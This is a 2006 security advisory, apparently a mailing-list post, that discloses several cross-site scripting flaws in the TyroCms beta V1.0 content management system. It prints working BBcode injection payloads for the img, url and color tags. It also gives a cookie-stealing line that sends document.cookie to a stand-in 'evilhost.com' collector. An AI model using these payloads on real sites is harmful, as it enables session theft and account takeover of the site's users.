OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
TyroCms beta V1.0 multiple XSS injections

zeroguegmail.com
Date: Tue May 02 2006 - 09:33:23 CDT


TyroCms beta V1.0 multiple XSS injections

Discovered by: Nomenumbra
Date: 5/2/2006
impact:moderate (privilege escalation,possible defacement)

TyroCMS is a PHP & MySql powered content management system(cms).
Inludes built-in forums, powerful admin control panel, secure user system, and much more.
Easily manage the site throuh the admin panel even if you do not have great webmastering skills!

Due to the way BBcode is interprented by TyroCms it is possible to inject javascript in several statements like:
In images:

[img]javascript:alert('xss')[/img]

or in urls:

[url=x" onmouseover="alert('xss')]Site Name[/url]

or in colors:

[color=red" onmouseover="alert('xss')]lol[/color]

See? We could inject javascript like this:

javascript:window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)

to steal cookies.

Nomenumbra/[0x4F4C]